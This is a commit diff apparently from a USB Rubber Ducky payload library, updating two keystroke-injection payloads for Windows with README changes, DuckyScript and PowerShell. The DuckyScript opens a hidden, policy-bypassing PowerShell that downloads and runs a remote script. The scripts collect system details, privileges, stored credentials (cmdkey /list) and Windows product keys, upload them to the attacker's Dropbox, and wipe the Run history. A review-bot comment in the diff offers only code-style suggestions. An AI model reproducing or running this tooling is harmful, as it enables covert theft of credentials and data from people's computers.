Small updates
parent
ea737c4c6d
commit
3da90fee4d
|
@ -2,10 +2,13 @@
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
|
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt">
|
||||||
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
|
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
<a href="#">
|
<a href="#">
|
||||||
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
|
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||||
|
</a>
|
||||||
|
<a href="#">
|
||||||
|
<img alt="VERSION: 1.3" src="https://img.shields.io/badge/VERSION-1.3-green?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
|
@ -16,10 +19,9 @@ This payload sends you a brief user privilege escalation report via Dropbox. Onc
|
||||||
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|
|System Information|[WES-NG](https://github.com/bitsadmin/wesng)|
|
||||||
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|
|User Information|[Priv2Admin](https://github.com/gtworek/Priv2Admin)|
|
||||||
|Stored Credentials||
|
|Stored Credentials||
|
||||||
|Installed Programs|[Exploit Database](https://www.exploit-db.com) & [Packet Storm](https://packetstormsecurity.com)|
|
|Installed Programs|[Exploit Database](https://www.exploit-db.com/) & [Packet Storm](https://packetstormsecurity.com/)|
|
||||||
|
|
||||||
<details>
|
## Process
|
||||||
<summary>Extension operation</summary>
|
|
||||||
|
|
||||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||||
2. Opens a Windows Run dialog box.
|
2. Opens a Windows Run dialog box.
|
||||||
|
@ -28,14 +30,12 @@ This payload sends you a brief user privilege escalation report via Dropbox. Onc
|
||||||
- Prepares a report on target PC user privilege escalation.
|
- Prepares a report on target PC user privilege escalation.
|
||||||
- Sends the report to a file in your Dropbox.
|
- Sends the report to a file in your Dropbox.
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
## Prerequisites
|
## Prerequisites
|
||||||
|
|
||||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
|
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||||
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
|
||||||
|
|
||||||
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
> [!WARNING]
|
||||||
|
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
|
@ -45,4 +45,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
|
||||||
|
|
||||||
## Contributors
|
## Contributors
|
||||||
|
|
||||||
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
|
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
||||||
|
|
|
@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
|
||||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
|
|
||||||
DELAY #RHP_DELAY
|
DELAY #RHP_DELAY
|
||||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||||
|
|
||||||
|
|
|
@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
|
||||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
function Send-ToDropbox {
|
function Send-ToDropbox {
|
||||||
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
|
|
||||||
|
|
||||||
[CmdletBinding()]
|
[CmdletBinding()]
|
||||||
param(
|
param(
|
||||||
|
[Parameter(Mandatory = $true)]
|
||||||
|
[string]$Content,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$RefreshToken,
|
[string]$RefreshToken,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppKey,
|
[string]$AppKey,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppSecret,
|
[string]$AppSecret,
|
||||||
[Parameter(Mandatory = $true)]
|
|
||||||
[string]$Content,
|
|
||||||
[string]$OutputFolder = "Exfiltrated-content",
|
[string]$OutputFolder = "Exfiltrated-content",
|
||||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||||
)
|
)
|
||||||
|
|
||||||
try {
|
try {
|
||||||
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||||
|
"Authorization" = "Bearer $((
|
||||||
|
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||||
"Content-Type" = "application/x-www-form-urlencoded"
|
"Content-Type" = "application/x-www-form-urlencoded"
|
||||||
} -Body @{
|
} -Body @{
|
||||||
"grant_type" = "refresh_token"
|
"grant_type" = "refresh_token";
|
||||||
"refresh_token" = $RefreshToken
|
"refresh_token" = $RefreshToken;
|
||||||
"client_id" = $AppKey
|
"client_id" = $AppKey;
|
||||||
"client_secret" = $AppSecret
|
"client_secret" = $AppSecret
|
||||||
}).access_token
|
}
|
||||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
).access_token)";
|
||||||
"Authorization" = "Bearer $AccessToken"
|
"Content-Type" = "application/octet-stream";
|
||||||
"Content-Type" = "application/octet-stream"
|
|
||||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||||
} -Body $Content | Out-Null
|
} -Body $Content | Out-Null
|
||||||
}
|
}
|
||||||
|
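Review bot: The `#Documentation:` comment is dropped from Send-ToDropbox with nothing in its place, so the rewritten function no longer states what it does or where its contract is described; a header such as `# Exchanges $RefreshToken for an access token, then uploads $Content to /$OutputFolder/$OutputFile in the Dropbox app identified by $AppKey/$AppSecret.` followed by `# Reference: https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox` (the link the README now points to) would restore it. Folding the entire token-exchange Invoke-RestMethod into the `Authorization` header string (`"Bearer $((...).access_token)"`) is a step back in readability compared with the former `$AccessToken` local: a failure of the token request now surfaces while the upload call's headers are being built, and whatever handles the error after the `try` block closes (that part lies outside this hunk, as does the function's closing brace) can no longer tell the two requests apart, so keeping the token in a named variable and building the header from it would be clearer. Moving `[string]$Content` to the first parameter position also changes positional binding; the call sites updated in this commit pass every argument by name so they are unaffected, but any other caller that relied on position would bind differently. Minor: `"client_secret" = $AppSecret` is the only body entry without the trailing `;` the others gained. The identical hunk in the second script.ps1 further down this page has the same three points.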
@ -39,6 +38,7 @@ function Send-ToDropbox {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||||
|
|
||||||
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
|
$Report = "*** System Information ***`n $(SYSTEMINFO | Out-String)`n"
|
||||||
|
@ -46,4 +46,4 @@ $Report += "*** User Information ***`n $(WHOAMI /ALL | Out-String)`n"
|
||||||
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
|
$Report += "*** Stored Credentials ***`n $(CMDKEY /LIST | Out-String)`n"
|
||||||
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
$Report += "*** Installed Programs ***`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||||
|
|
||||||
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $Report
|
Send-ToDropbox -Content $Report -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
|
||||||
|
|
|
@ -2,17 +2,19 @@
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
|
<a href="https://payloadstudio.hak5.org/community/?device=usb-rubber-ducky&viewurl=https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt">
|
||||||
<img alt="View on: Payload Studio" src="https://img.shields.io/badge/View_on-Payload_Studio-red?style=flat-square">
|
<img alt="VIEW ON: HAK5 PAYLOADSTUDIO" src="https://img.shields.io/badge/VIEW_ON-HAK5_PAYLOADSTUDIO-red?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
<a href="#">
|
<a href="#">
|
||||||
<img alt="Target: Windows 10, 11" src="https://img.shields.io/badge/Target-Windows_10,_11-blue?style=flat-square">
|
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
|
||||||
|
</a>
|
||||||
|
<a href="#">
|
||||||
|
<img alt="VERSION: 1.0" src="https://img.shields.io/badge/VERSION-1.0-green?style=for-the-badge">
|
||||||
</a>
|
</a>
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
This payload sends you the target PC's Windows product key via Dropbox.
|
This payload sends you the target PC's Windows product key via Dropbox.
|
||||||
|
|
||||||
<details>
|
## Process
|
||||||
<summary>Extension operation</summary>
|
|
||||||
|
|
||||||
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
1. Detects when the USB Rubber Ducky is ready and whether the target operating system is Windows.
|
||||||
2. Opens a Windows Run dialog box.
|
2. Opens a Windows Run dialog box.
|
||||||
|
@ -21,14 +23,12 @@ This payload sends you the target PC's Windows product key via Dropbox.
|
||||||
- Recovers Windows product key from target PC.
|
- Recovers Windows product key from target PC.
|
||||||
- Sends the Windows product key of the target PC to a file in your Dropbox.
|
- Sends the Windows product key of the target PC to a file in your Dropbox.
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
## Prerequisites
|
## Prerequisites
|
||||||
|
|
||||||
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox).
|
First of all, you need to set up an appropriate Dropbox exfiltration "App" to obtain your "app key", "app secret" and "refresh token", which you can do by following the quick tutorial available [here](https://codeberg.org/PlumpyTurkey/Ducky-Utilities/src/branch/main/PowerShell-Functions/Send-ToDropbox). Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
||||||
Once you get them, you need to download the "script.ps1" file for this payload and edit it to add the values for your "App". Once you've done that, all you need to do is host the modified file and make it downloadable from a URL that you set as an option for this payload.
|
|
||||||
|
|
||||||
> Note: If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
> [!WARNING]
|
||||||
|
> If you're using Dropbox to host your script, make sure the download link for your script ends with "dl=1" and not "dl=0".
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
|
@ -38,4 +38,4 @@ Once you get them, you need to download the "script.ps1" file for this payload a
|
||||||
|
|
||||||
## Contributors
|
## Contributors
|
||||||
|
|
||||||
- [@PlumpyTurkey](https://github.com/PlumpyTurkey)
|
- [PlumpyTurkey](https://codeberg.org/PlumpyTurkey)
|
||||||
|
|
|
@ -89,6 +89,7 @@ EXTENSION RUN_HOSTED_POWERSHELL
|
||||||
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
|
|
||||||
DELAY #RHP_DELAY
|
DELAY #RHP_DELAY
|
||||||
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
|
||||||
|
|
||||||
|
|
|
@ -3,34 +3,33 @@ $APP_KEY = "XXXXXXXXXXXXXXX"
|
||||||
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
$APP_SECRET = "XXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
function Send-ToDropbox {
|
function Send-ToDropbox {
|
||||||
#Documentation: https://github.com/PlumpyTurkey/Ducky-Utilities/tree/main/PowerShell-Functions/Send-ToDropbox
|
|
||||||
|
|
||||||
[CmdletBinding()]
|
[CmdletBinding()]
|
||||||
param(
|
param(
|
||||||
|
[Parameter(Mandatory = $true)]
|
||||||
|
[string]$Content,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$RefreshToken,
|
[string]$RefreshToken,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppKey,
|
[string]$AppKey,
|
||||||
[Parameter(Mandatory = $true)]
|
[Parameter(Mandatory = $true)]
|
||||||
[string]$AppSecret,
|
[string]$AppSecret,
|
||||||
[Parameter(Mandatory = $true)]
|
|
||||||
[string]$Content,
|
|
||||||
[string]$OutputFolder = "Exfiltrated-content",
|
[string]$OutputFolder = "Exfiltrated-content",
|
||||||
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
|
||||||
)
|
)
|
||||||
|
|
||||||
try {
|
try {
|
||||||
$AccessToken = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
||||||
|
"Authorization" = "Bearer $((
|
||||||
|
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
|
||||||
"Content-Type" = "application/x-www-form-urlencoded"
|
"Content-Type" = "application/x-www-form-urlencoded"
|
||||||
} -Body @{
|
} -Body @{
|
||||||
"grant_type" = "refresh_token"
|
"grant_type" = "refresh_token";
|
||||||
"refresh_token" = $RefreshToken
|
"refresh_token" = $RefreshToken;
|
||||||
"client_id" = $AppKey
|
"client_id" = $AppKey;
|
||||||
"client_secret" = $AppSecret
|
"client_secret" = $AppSecret
|
||||||
}).access_token
|
}
|
||||||
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
|
).access_token)";
|
||||||
"Authorization" = "Bearer $AccessToken"
|
"Content-Type" = "application/octet-stream";
|
||||||
"Content-Type" = "application/octet-stream"
|
|
||||||
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
|
||||||
} -Body $Content | Out-Null
|
} -Body $Content | Out-Null
|
||||||
}
|
}
|
||||||
|
@ -39,9 +38,10 @@ function Send-ToDropbox {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
|
||||||
|
|
||||||
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
|
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
|
||||||
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
|
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
|
||||||
|
|
||||||
Send-ToDropbox -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET -Content $ProductKey
|
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET
|
||||||
|
|